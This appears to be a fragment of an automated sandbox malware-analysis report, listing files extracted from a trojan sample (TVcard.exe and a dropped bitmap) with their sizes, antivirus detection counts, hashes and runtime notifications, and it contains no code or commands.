| mozilla.org | Domain/IP reference | 00017421-00004484-17710-375-00409A77 |

Extracted Files

Malicious 1

TVcard.exe
- Size: 90KiB (92160 bytes)
- Type: peexe executable
- Description: PE32 executable (GUI) Intel 80386, for MS Windows
- AV Scan Result: Labeled as "Trojan.Generic" (29/73)
- Runtime Process: OURORDERNOHSCLGD-140526.exe (PID: 3896)
- MD5: 50313e466a38e41be62ecf188e103673
- SHA1: d60d3bc51006f03e5440c6152638ef16e8c4ef7a
- SHA256: 1b44acfc7e6b0d0cf553273a8e46e1f49c8e3e0a449e36ab61dfad8e9c954c47

Informative 2

c6e53759ff54727c35ea84c1a56f8b1f_733c94c5-cebb-4f98-a75f-22a797d1d50b
- Size: 48B (48 bytes)
- Type: data
- Runtime Process: TVcard.exe (PID: 4484)
- MD5: 8f268cb2234a577288e7810ec660471c
- SHA1: ee22525b09e0fd1e7f0f8bb864c99db9646e2ef1
- SHA256: 4c318d03f2f4d8adeea736b890df3bcbc30b52360c81779bff3a17a3429f99e7

F.bmp
- Size: 432KiB (442050 bytes)
- Type: unknown
- Description: PC bitmap, Windows 3.x format, 178 x 261 x 24
- Runtime Process: OURORDERNOHSCLGD-140526.exe (PID: 3896)
- MD5: 8956ceb7884070c9cbf2583337426143
- SHA1: c7de4b950dcd123f956fe057a92936f96209f6d4
- SHA256: e0f8a7d7c232f0273108e7751036351f2b8682e4965504402733bd9081542a5b

Notifications

Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all sources for indicator ID "string-24" are available in the report
- Not all sources for indicator ID "string-64" are available in the report
- Not all strings are visible in the report, because the maximum number of strings was reached (5000)